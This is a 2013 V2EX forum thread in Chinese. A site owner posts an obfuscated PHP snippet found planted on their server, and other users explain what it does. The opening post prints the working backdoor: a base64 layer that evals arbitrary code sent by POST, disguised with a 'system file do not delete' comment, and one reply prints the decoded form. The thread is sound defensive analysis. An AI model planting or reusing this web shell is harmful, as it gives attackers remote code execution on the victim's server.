网站被植入这样的代码，能翻译下么？想知道他是干嘛的。。 - V2EX

Home Sign Up Sign In

This topic created in 4862 days ago, the information mentioned may be changed or developed.

<?php //cb6f82f3e4007bdaccf419abafab94c8
$_=
//system file do not delete
'CmlmKGlzc2V0KCRfUE9TVFsiY29kZSJdKSkKewogICAgZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsiY29kZSJdKSk7Cn0=';
//system file do not delete
$__ = "JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCRfKTsKZXZhbCgkY29kZSk7";$___ = "\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";eval($___($__));

13 replies • 1970-01-01 08:00:00 +08:00

1

mechille

Jan 29, 2013

空间商植入的？

2

isy

OP

Jan 29, 2013

@mechille 应该是利用上传漏洞上传的。

3

clww

Jan 29, 2013

1

if(isset($_POST["code"]))
{
eval(base64_decode($_POST["code"]));
}

4

C0VN

Jan 29, 2013

base64 编码

5

isy

OP

Jan 29, 2013

@clww @xavierskip 后面这段呢？

$___ = "\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";

6

isy

OP

Jan 29, 2013

明白了。。

$___ = "\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65"; 等于 base64_decode

7

nazor

Jan 29, 2013

是比较加密过的一句话。

8

shinwood

Jan 29, 2013 via iPhone

可以执行任意PHP代码的一个Hook。

9

SuperOS

Jan 29, 2013

webshell 服务器端

10

solo7net

Jan 29, 2013

传说中的一句话马?

11

inroading

Jan 30, 2013

一字马

12

holystrike

Jan 30, 2013 via iPhone

服务器上把eval函数禁了

13

mozutaba

Feb 3, 2013

一句话，dangrous没拼错吧

About · Help · Advertise · Blog · API · FAQ · Solana · 2960 Online Highest 6679 ·

Select Language

创意工作者们的社区

World is powered by solitude

VERSION: 3.9.8.5 · 46ms · UTC 07:26 · PVG 15:26 · LAX 00:26 · JFK 03:26
♥ Do have faith in what you're doing.